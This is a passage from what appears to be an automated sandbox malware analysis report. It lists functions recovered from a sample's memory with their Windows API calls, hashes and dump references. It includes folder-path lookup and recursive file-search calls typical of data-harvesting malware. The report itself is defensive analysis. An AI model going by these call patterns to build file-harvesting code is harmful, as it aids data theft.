                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: 62c7746ab33959b539270a53ee3e1874ff3604d85e85fef4385a05e7190cf381
                  • Instruction ID: ca86d5db6cf1c6158250f34abb1496e8e52108228bc157bc688167033d8cb23c
                  • Opcode Fuzzy Hash: 62c7746ab33959b539270a53ee3e1874ff3604d85e85fef4385a05e7190cf381
                  • Instruction Fuzzy Hash: FE315C75A4020CAFDB14DFD0CC49BEDB7B9EB49300F104559E506AB184DB74AA8AEB52
                  Function 00C192E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00C13AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C13AEE,?), ref: 00C192FC
                  • GetFileSizeEx.KERNEL32(000000FF,00C13AEE), ref: 00C19319
                  • CloseHandle.KERNEL32(000000FF), ref: 00C19327
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: e58979a40f2776bab8ae5df6e4d56b3b5605e94e68a50c553440618dbd0e4d37
                  • Instruction ID: 7760a87cc6717948a85579c31ba9f1a6feb7b36781253d9d7671a4979d165e38
                  • Opcode Fuzzy Hash: e58979a40f2776bab8ae5df6e4d56b3b5605e94e68a50c553440618dbd0e4d37
                  • Instruction Fuzzy Hash: 00F0AF39E80208BFDB20DFB2DC18F9E77B9EB49320F50C264B621A72D0D6B497419B40
                  Function 00C1C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 00C1C74E
                    • Part of subcall function 00C1BF9F: __amsg_exit.LIBCMT ref: 00C1BFAF
                  • __getptd.LIBCMT ref: 00C1C765
                  • __amsg_exit.LIBCMT ref: 00C1C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00C1C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 1205f85e309656e9e05f91f8a7eae5f8c0f80a815f63e1d2f7a4e93538f4f2a2
                  • Instruction ID: 763031ac670cbe1bd0544f59df4296fe515c7b37f6710fac09d12b0f5c88838e
                  • Opcode Fuzzy Hash: 1205f85e309656e9e05f91f8a7eae5f8c0f80a815f63e1d2f7a4e93538f4f2a2
                  • Instruction Fuzzy Hash: E7F0B432981710DFD720BBF858877DD33A06F02720F244149F414A62D2CBA45DD2BF96
                  Function 00C14F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14F7A
                  • lstrcat.KERNEL32(?,00C21070), ref: 00C14F97
                  • lstrcat.KERNEL32(?,017992D0), ref: 00C14FAB
                  • lstrcat.KERNEL32(?,00C21074), ref: 00C14FBD
                    • Part of subcall function 00C14910: wsprintfA.USER32 ref: 00C1492C
                    • Part of subcall function 00C14910: FindFirstFileA.KERNEL32(?,?), ref: 00C14943
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C20FDC), ref: 00C14971
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C20FE0), ref: 00C14987
                    • Part of subcall function 00C14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C14B7D
                    • Part of subcall function 00C14910: FindClose.KERNEL32(000000FF), ref: 00C14B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 085a603e7d44af0319d7efa4ed16d6e71cf965a2011c450aeb4891d96c3b4335
                  • Instruction ID: ffbf921f82757780be340021ab8af5f22a795be316b5542b0f4ae414b175dc5c
                  • Opcode Fuzzy Hash: 085a603e7d44af0319d7efa4ed16d6e71cf965a2011c450aeb4891d96c3b4335
                  • Instruction Fuzzy Hash: 96210D7A940204ABC754FBB0EC46EED333CAB56700F044564B649660C1EE7496CDDB92